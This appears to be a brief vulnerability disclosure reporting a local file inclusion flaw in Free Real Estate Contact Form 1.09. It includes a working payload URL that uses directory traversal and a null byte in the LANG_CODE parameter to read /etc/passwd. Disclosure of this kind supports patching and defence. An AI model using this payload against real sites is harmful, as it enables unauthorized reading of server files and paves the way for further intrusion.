Free Real Estate Contact Form version 1.09 suffers from a local file inclusion vulnerability.
9704856e0f082a62d5fa1de0e04b91c328256fa892fd19f381864f764e2835ea
#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Free Real Estate Contact Form
# Version: 1.09
# Vendor: http://www.phpkobo.com/realestate_contact.php
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/codelib/sys/common.inc.php?LANG_CODE=../../../../../../../etc/passwd%00
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################